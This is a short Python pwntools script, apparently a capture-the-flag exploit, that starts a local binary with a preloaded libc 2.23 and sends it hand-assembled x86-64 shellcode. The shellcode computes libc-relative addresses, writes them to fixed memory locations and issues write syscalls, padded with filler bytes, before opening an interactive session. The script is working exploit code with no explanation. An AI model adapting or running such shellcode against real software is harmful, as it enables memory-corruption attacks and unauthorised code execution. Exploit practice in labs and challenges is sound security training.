#!/usr/bin/env python
from pwn import *
with context.quiet:
p = process('./program', env = {'LD_PRELOAD': './libc-2.23.so'})
'''
generated from exploit.asm
nasm -f bin -o sc exploit.asm
ndisasm -b64 sc
'''
shellcode = '\x48\x8B\x1C\x25\x60\x20\x60\x00\x48\x81\xEB\x50\x72\x0F\x00\x48\x89\xD9\x48\x81\xC1\xC5\xB8\x08\x00\x48\x89\x0C\x25\x00\x21\x60\x00\x48\x89\xD9\x48\x81\xC1\x16\x52\x04\x00\x48\x89\x0C\x25\x08\x21\x60\x00\xEB\x28\x48\x8B\x7D\xD4\x5E\xBA\x7D\x00\x00\x00\xB8\x01\x00\x00\x00\x0F\x05\x48\x8B\x7D\xD4\xBE\x00\x21\x60\x00\xBA\x10\x00\x00\x00\xB8\x01\x00\x00\x00\x0F\x05\xEB\xFE\xE8\xD3\xFF\xFF\xFF\x0A\x88\x00\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42'
p.send(p32(len(shellcode)))
p.send(shellcode)
p.interactive()